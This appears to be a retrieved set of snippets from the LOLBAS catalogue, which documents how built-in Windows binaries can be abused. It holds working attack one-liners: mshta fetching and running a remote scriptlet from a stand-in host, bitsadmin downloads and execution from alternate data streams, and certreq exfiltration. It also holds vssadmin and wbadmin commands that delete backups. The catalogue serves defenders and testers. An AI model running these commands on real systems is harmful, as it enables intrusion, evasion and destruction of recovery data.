### Execute from Alternate Data Stream using Bitsadmin.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This example demonstrates executing a command from an Alternate Data Stream (ADS) using Bitsadmin.exe. It involves creating a BITS job, adding a file to be transferred, specifying the target command within an ADS of a file for execution, and then resuming and completing the job. This technique is often used for stealthy execution. ```yaml bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\temp\file.txt bitsadmin /SetNotifyCmdLine 1 c:\temp\file.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 ``` -------------------------------- ### LOLBAS YAML Entry Structure Example Source: https://context7.com/lolbas-project/lolbas/llms.txt This snippet illustrates the standardized YAML schema used for each LOLBAS entry. It documents a binary, script, or library with its associated techniques and metadata, including command syntax, MITRE ATT&CK mappings, and detection resources. ```yaml --- Name: Binary.exe Description: Something general about the binary Aliases: # Optional field for alternative names - Alias: Binary64.exe Author: The name of the person that created this file Created: 1970-01-01 # YYYY-MM-DD format Commands: - Command: The command syntax Description: Description of the command Usecase: A description of the usecase Category: Execute # One of: ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload Privileges: User # or Administrator MitreID: T1055 # MITRE ATT&CK technique ID OperatingSystem: Windows 10 1803, Windows 10 1703 Tags: - Key1: Value1 Full_Path: - Path: c:\\windows\\system32\\bin.exe - Path: c:\\windows\\syswow64\\bin.exe Code_Sample: - Code: http://example.com/sample.txt Detection: - IOC: Event ID 10 - Sigma: https://github.com/SigmaHQ/sigma/blob/... - Elastic: https://github.com/elastic/detection-rules/blob/... - Splunk: https://github.com/splunk/security_content/blob/... - BlockRule: https://docs.microsoft.com/... Resources: - Link: http://blogpost.com Acknowledgement: - Person: John Doe Handle: '@johndoe' ``` -------------------------------- ### Execute Binary via Bitsadmin.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This snippet shows how to execute a binary file using Bitsadmin.exe by configuring a BITS job to run a specified command after the file transfer. It creates a job, copies the target binary, sets a notification command line to execute it, and then resumes the job. This can be used for defensive evasion. ```yaml bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\temp\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\temp\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset ``` -------------------------------- ### Download File using Bitsadmin.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This snippet demonstrates how to download a file from a remote URL to a local path using Bitsadmin.exe. It involves creating a BITS job, adding the file transfer task, resuming the job, and completing it. This is useful for retrieving files from the internet. ```yaml bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\temp\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 ``` -------------------------------- ### Java Agent/Library Loading with Java.exe Source: https://github.com/lolbas-project/lolbas/blob/master/Backlog.txt Java.exe can be leveraged to load custom Java agents or libraries using the '-agentpath' or '-agentlib' flags. This can be used for various purposes, including code injection or monitoring. ```bash java.exe -agentpath:= -jar java.exe -agentlib:= -jar ``` -------------------------------- ### Copy File using Bitsadmin.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This command copies a local file to another location on the system using Bitsadmin.exe. It creates a BITS job, adds the local file copy task, resumes and completes the job, and then resets the job. This can be used for file exfiltration or persistence. ```yaml bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\temp\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset ``` -------------------------------- ### Exfiltrate Data with Certreq.exe Source: https://github.com/lolbas-project/lolbas/blob/master/Backlog.txt Certreq.exe can be used to exfiltrate data by embedding it within a certificate request. This method leverages the binary's functionality to create and submit certificate requests, which can be manipulated to include arbitrary data. ```powershell certreq -submit -attrib "CertificateTemplate=WebServer" -config "http:///certsrv/certnew.asp" payload.inf request.cer ``` -------------------------------- ### Delete Catalog with Wbadmin.exe Source: https://github.com/lolbas-project/lolbas/blob/master/Backlog.txt Wbadmin.exe is a command-line tool for Windows Server Backup. It can be used to delete the backup catalog, which may be part of an attacker's cleanup or disruption efforts. ```cmd wbadmin delete catalog -quiet ``` -------------------------------- ### Execute Inline VBScript with Mshta.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This command executes VBScript directly from the command line using mshta.exe. It leverages the `vbscript:` protocol and can be used to execute remote scripts by specifying a URL to a scriptlet file (.sct). ```yaml --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: # Execute VBScript inline - Command: mshta.exe vbscript:Close(Execute("GetObject(\"script:https://example.com/payload.sct\")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: VBScript ``` -------------------------------- ### Remote Code Execution with Psexec.exe Source: https://github.com/lolbas-project/lolbas/blob/master/Backlog.txt Psexec.exe is a powerful tool from the Sysinternals suite that allows for remote execution of processes on other systems. It requires administrative privileges on the target machine and network connectivity. ```cmd psexec.exe \\ -u -p ``` -------------------------------- ### Execute Local HTA File with Mshta.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This command executes a local HTA file using mshta.exe. The HTA file can contain embedded JavaScript, JScript, or VBScript. This method is useful for executing code stored locally on the system. ```yaml --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: # Execute local HTA file - Command: mshta.exe c:\temp\malicious.hta Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: HTA - Execute: Remote ``` -------------------------------- ### Execute HTA from Alternate Data Stream with Mshta.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This command executes an HTA file that is hidden within an Alternate Data Stream (ADS) of another file. Mshta.exe can be used to execute code embedded in an ADS, making it useful for stealthy execution. ```yaml --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: # Execute from Alternate Data Stream - Command: mshta.exe "c:\temp\file.txt:hidden.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream Category: ADS Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: HTA ``` -------------------------------- ### Execute Inline JavaScript with Mshta.exe Source: https://context7.com/lolbas-project/lolbas/llms.txt This command executes JavaScript directly from the command line using mshta.exe. It uses the `javascript:` protocol and can execute remote scripts by fetching a scriptlet file (.sct). The `close()` function is used to close the mshta window after execution. ```yaml --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: # Execute JavaScript inline - Command: mshta.exe javascript:a=GetObject("script:https://example.com/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript ``` -------------------------------- ### Delete VSS Shadows with Vssadmin.exe Source: https://github.com/lolbas-project/lolbas/blob/master/Backlog.txt Vssadmin.exe can be used to delete Volume Shadow Copies (VSS) to hinder forensic investigations or data recovery. The '/All' flag targets all shadow copies, and '/Quiet' suppresses confirmation prompts. ```cmd vssadmin.exe Delete Shadows /All /Quiet ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.